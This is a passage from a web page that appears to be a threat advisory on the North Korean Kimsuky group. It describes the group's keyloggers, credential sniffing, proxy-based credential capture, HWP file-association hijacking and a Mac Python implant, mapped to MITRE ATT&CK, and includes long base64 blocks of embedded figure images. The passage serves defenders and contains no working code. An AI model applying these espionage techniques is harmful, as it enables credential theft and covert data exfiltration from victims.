2TksFkRzGsYZHIICnIx7+9alFAGZH4esIgoWN/lGBlyf89afDo1vDDPCrzGKYFfLaQlUB/ujtWhRQBHBG0cCI7b2VQC2OtV5tMt5kKsG6EZDcjnOR75q5RQNNrYzX0S2kMZkeZ2Rdu4yHLDOcH15qa302G2uGmj3lmyAGYkLnk4HarlFKyG5yfUrXVoLoxBmIRHDlR/FjoPpmqraU0txeCd0e0ugMptIYED1z7Vp0U1o7oky20gx2QtrSXaGkDyvLl2fkE8568VZk06GWWeR95M8flupY7dvsO3WrdFDd9wMVvDNv+6WOe5RFLM5Ep3SZAHJ9MCpIPD1tFPLJIzyI7EpEzHZGCAOF9cd61qKAKEOjwQpGpeaTy9wQySFiAwwR9MVH/YNl5qSFXIVQoQudvTbnHrjitOigDPt9Gt7YKBJO6oTsWSUsEBGMD2xQNGhW6hnSW4UwoY0QSnbj6VoUUAZKeHLVIHi866YNIZMtMSwJ64PvnmpxpaRyW7QMUWGPyivXcnp/wDXq/RQBUexA077JbuYl2CMN1IHT+VWIo1hiSNPuoAo+gp9FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAfJnjP8A5HfXv+wjcf8AoxqKPGf/ACO+vf8AYRuP/RjUUAfRugvPF8OdFltZFSSPTrdvmXIIEa5FdHE4liRwCAyg8jFcVoHiLw9J4F0ayuPEOm28i2NukqG7iDqQi5Ugng8YreHjLw0AAPEOkYH/AE+xf/FUAbVJisb/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA2qKxf+Ez8Nf9DDpH/gbF/wDFUf8ACZ+Gv+hh0j/wNi/+KoA2qKxf+Ez8Nf8AQw6R/wCBsX/xVH/CZ+Gv+hh0j/wNi/8AiqANqisX/hM/DX/Qw6R/4Gxf/FUf8Jn4a/6GHSP/AANi/wDiqANqisX/AITPw1/0MOkf+BsX/wAVR/wmfhr/AKGHSP8AwNi/+KoA+ZvGf/I769/2Ebj/ANGNRTPFk0Vz4x1qaCRJYpL+d0kRgyspkYggjqCKKAP/2Q==” style=”width: 482px; height: 368px;” /></font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 3: JavaScript file, named <code>jQuery.js</code></em> [<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>52</a>]</p>

<ul>
<li>Kimsuky also uses a PowerShell based keylogger, named MECHANICAL, and a network sniffing tool, named Nirsoft SniffPass (<em>Input Capture: Keylogging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001/”>T1056.001</a>], <em>Network Sniffing</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1040/”>T1040</a>]). MECHANICAL logs keystrokes to <code>%userprofile%appdataroamingapach.{txt,log}</code> and is also a “cryptojacker,” which is a tool that uses a victim’s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols.[<a href=”https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia”>53</a>]</li>
<li>Kimsuky used actor-modified versions of PHProxy, an open-source web proxy written in PHP, to examine web traffic between the victim and the website accessed by the victims and to collect any credentials entered by the victim.[54]</li>
</ul>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Discovery</h4>

<p>Kimsuky enumerates system information and the file structure for victims’ computers and networks (<em>Discovery</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0007/”>TA0007</a>]). Kimsuky appears to rely on using the victim’s operating system command prompt to enumerate the file structure and system information (<em>File and Directory Discovery </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1083/”>T1083</a>]). The information is directed to <code>C:WINDOWSmsdatl3.inc</code>, read by malware, and likely emailed to the malware’s command server.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>55</a>]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Collection</h4>

<p>Kimsuky collects data from the victim system through its HWP document malware and its keylogger (<em>Collection</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0009/”>TA0009</a>]). The HWP document malware changes the default program association in the Registry to open HWP documents (<em>Event Triggered Execution: Change Default File Association</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001/”>T1546.001</a>]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to <code>C:Program FilesCommon FilesSystemOle DBmsolui80.inc</code> and records the active window name where the user pressed keys (<em>Input Capture: Keylogging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001/”>T1056.001</a>]). There is another keylogger variant that logs keystrokes into <code>C:WINDOWSsetup.log</code>.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>56</a>]</p>

<p>Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (<em>Command and Scripting Interpreter: Python</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/006/”>T1059.006]</a>). The Python program downloads various implants based on C2 options specified after the <code>filedown.php</code> (see figure 4).</p>

<p align=”center” style=”text-align: center; margin-bottom: 8px;”><span style=”page-break-after: avoid;”><font color=”#000000″><font face=”Times New Roman”><img alt=”” data-entity-type=”” data-entity-uuid=”” src=”https://us-cert.cisa.govdata:image/png;base64,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